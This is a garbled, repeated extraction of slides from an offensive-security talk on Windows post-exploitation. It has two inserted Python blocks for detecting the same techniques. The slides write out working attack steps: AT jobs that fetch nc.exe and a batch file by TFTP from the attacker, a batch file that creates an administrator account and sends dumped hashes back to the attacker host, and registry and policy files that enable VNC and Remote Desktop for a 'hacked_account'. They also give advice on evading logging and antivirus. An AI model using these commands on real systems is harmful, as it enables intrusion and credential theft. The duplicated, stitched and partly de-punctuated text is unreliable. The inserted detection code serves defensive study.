ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification
• Enabling VNC (from command line)
– Go get VNC (check out guh.nu)
– Make a folder on the target for the vnc files
– Copy the following files to the target folder:
• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll
– regedit -s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected"
vnc.reg file contents:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: a system controlling access to security doors
– No command line way of modifying the system; you need the GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =
– This file will fix the policy settings that are in your way
– Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
• secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
• gpupdate /force
• net start "terminal services"
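The two files the procedure writes are ordinary secedit template and .reg formats, so the same parsers let a defender baseline the settings the procedure changes. The following is an added example, not the talk's tooling: it parses a secedit .ini ([Privilege Rights]) and a .reg export (the same format as the vnc.reg file on slide 51), then flags the drift this procedure leaves behind: logon rights granted to an unapproved principal, deny-logon rights emptied, and fDenyTSConnections flipped to 0. The inputs are the slides' own files verbatim ("hacked_account" is the slides' placeholder); the hardened counterparts and the approved-principal list are constructed assumptions for the example.

```python
"""Flag the user-rights and registry drift left by the Remote Desktop
re-enable procedure (added example, not from the talk)."""
import configparser
import re

# Constructed inputs: the two files from the slides, verbatim.
FIX_TS_POLICY_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =
"""
ENABLE_TS_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""
# Constructed hardened counterparts: rights limited to built-in groups,
# deny lists populated, connections denied again.
HARDENED_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = Administrators,Remote Desktop Users
SeInteractiveLogonRight = Administrators,Users
SeDenyInteractiveLogonRight = Guests
SeDenyRemoteInteractiveLogonRight = Guests
SeDenyNetworkLogonRight = Guests
"""
HARDENED_REG = ENABLE_TS_REG.replace('"fDenyTSConnections"=dword:00000000',
                                     '"fDenyTSConnections"=dword:00000001')
# Assumption for the example: principals allowed the two logon rights.
APPROVED_LOGON = {"Administrators", "Remote Desktop Users", "Users"}
TS_KEY = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"

REG_VALUE_RE = re.compile(r'^"?([^"=]+)"?=(?:dword:([0-9a-fA-F]{8})|"(.*)"|(.*))$')


def parse_secedit_template(text: str) -> dict:
    """Return {right_name_lower: [principals]} from [Privilege Rights]."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",),
                                   allow_no_value=True)
    cp.optionxform = str
    cp.read_string(text)
    rights = {}
    if cp.has_section("Privilege Rights"):
        for name, value in cp.items("Privilege Rights"):
            # secedit writes SIDs as *S-1-5-...; strip the marker, keep names as-is
            rights[name.lower()] = [p.strip().lstrip("*")
                                    for p in (value or "").split(",") if p.strip()]
    return rights


def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: value}}; dword values become ints."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
            continue
        m = REG_VALUE_RE.match(line)
        if m and current is not None:
            name, dword, quoted, other = m.groups()
            result[current][name] = int(dword, 16) if dword is not None else (
                quoted if quoted is not None else other)
    return result


def check_drift(template_text: str, reg_text: str, approved) -> list:
    """List the findings a baseline comparison would raise on these two files."""
    approved_lc = {a.lower() for a in approved}
    findings = []
    rights = parse_secedit_template(template_text)
    for right in ("seremoteinteractivelogonright", "seinteractivelogonright"):
        for principal in rights.get(right, []):
            if principal.lower() not in approved_lc:
                findings.append(f"{right}: granted to unapproved principal '{principal}'")
    for right in ("sedenyinteractivelogonright", "sedenyremoteinteractivelogonright",
                  "sedenynetworklogonright"):
        if right in rights and not rights[right]:
            findings.append(f"{right}: deny list emptied")
    ts = parse_reg(reg_text).get(TS_KEY, {})
    if ts.get("fDenyTSConnections") == 0:
        findings.append("fDenyTSConnections=0: Remote Desktop connections enabled")
    return findings


if __name__ == "__main__":
    for f in check_drift(FIX_TS_POLICY_INI, ENABLE_TS_REG, APPROVED_LOGON):
        print("drift:", f)
    print("hardened:", check_drift(HARDENED_INI, HARDENED_REG, APPROVED_LOGON))
```

Run against the slides' files the checker reports six findings (two unapproved grants, three emptied deny lists, and the registry flip); the hardened pair produces none. The same `parse_reg` reads the vnc.reg file from slide 51, where a `Password` value and `SocketConnect=1` under the WinVNC3 key are the values to baseline.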
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
– Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
– Enable / start services
– Transfer files
– Add users
– Mess with the registry, policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
• Establish authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
– net use \\target
– net time \\target
– at \\target (net time +1min) "tftp -i us GET e.bat"
– at \\target (net time +2min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hashdumping tools and dumps hashes
• Sends hashes, identified by IP, back to the attacker host
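The flow on this slide leaves a predictable trace in the target's Security log: a scheduled job is created a minute or two ahead, a local user appears, and that user lands in Administrators, all on one host within a few minutes. The following correlator is an added detection example, not the talk's tooling. The event IDs are the real Windows ones for the three stages (602, 624, 636 on XP/2003; 4698, 4720, 4732 on Vista and later); the pipe-separated line format, hosts, users and timestamps are constructed for the example.

```python
"""Correlate the Security-log trace of the AT-driven batch flow
(added example, not from the talk)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Windows Security event IDs for the three stages, both log generations.
STAGE_BY_EVENT = {
    602: "task_created", 4698: "task_created",
    624: "user_created", 4720: "user_created",
    636: "admin_added",  4732: "admin_added",
}
SEQUENCE = ("task_created", "user_created", "admin_added")


def parse_line(line: str) -> dict:
    """Parse the constructed 'ISO-timestamp|host|event_id|detail' format."""
    ts, host, eid, detail = line.split("|", 3)
    return {"ts": datetime.fromisoformat(ts), "host": host,
            "event_id": int(eid), "detail": detail}


def correlate(lines, window_seconds: int = 600) -> list:
    """One alert per host where task -> user -> admin completes inside the window."""
    window = timedelta(seconds=window_seconds)
    by_host = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        stage = STAGE_BY_EVENT.get(ev["event_id"])
        if stage:                       # events outside the pattern are ignored
            ev["stage"] = stage
            by_host[ev["host"]].append(ev)

    alerts = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e["ts"])
        consumed = set()                # indexes already attributed to an alert
        for i, start in enumerate(events):
            if i in consumed or start["stage"] != SEQUENCE[0]:
                continue
            chain, want = [i], 1
            for j in range(i + 1, len(events)):
                if events[j]["ts"] - start["ts"] > window:
                    break               # chain went stale; try the next start
                if j not in consumed and events[j]["stage"] == SEQUENCE[want]:
                    chain.append(j)
                    want += 1
                    if want == len(SEQUENCE):
                        consumed.update(chain)
                        alerts.append({
                            "host": host,
                            "start": events[chain[0]]["ts"],
                            "end": events[chain[-1]]["ts"],
                            "events": [events[k]["event_id"] for k in chain],
                            "detail": [events[k]["detail"] for k in chain],
                        })
                        break
    return alerts


# Constructed log lines (hosts, users and timestamps invented for the example).
SAMPLE_LOG = [
    "2008-03-10T12:00:05|WS-042|540|Successful Network Logon: svc_backup from 10.0.0.9",
    "2008-03-10T12:00:40|WS-042|602|Scheduled Task created: At1.job",
    "2008-03-10T12:01:15|WS-042|602|Scheduled Task created: At2.job",
    "2008-03-10T12:02:03|WS-042|624|User Account Created: hacked",
    "2008-03-10T12:02:04|WS-042|636|Security Enabled Local Group Member Added: hacked -> Administrators",
    "2008-03-10T13:30:00|FS-01|4698|A scheduled task was created: \\Backup\\Nightly",
    "2008-03-11T09:00:00|FS-01|4720|A user account was created: jdoe",
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(f"{a['host']}: {a['events']} between {a['start']} and {a['end']}")
```

On the sample the workstation's sequence fires once (the two AT jobs are not double-counted), while the file server's legitimate task and a next-day account creation stay below the window. Note that none of the three events fires unless "Audit account management" and, for 602, "Audit object access" are enabled, which is the same point slide 37 makes from the other side.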
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use, re-use
– Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
– Beyond EIP – The theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
– Thanks to
• All the people from the offensivecomputing, nologin, uninformed IRC and SILC channels
• HD Moore, especially for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 35
Stealth Evading Detection
• Different Perspective
– DON'T BE AN ANOMALY
– Hide in plain sight
• Many tools have ONLY malicious uses
• Make your intent hard to determine
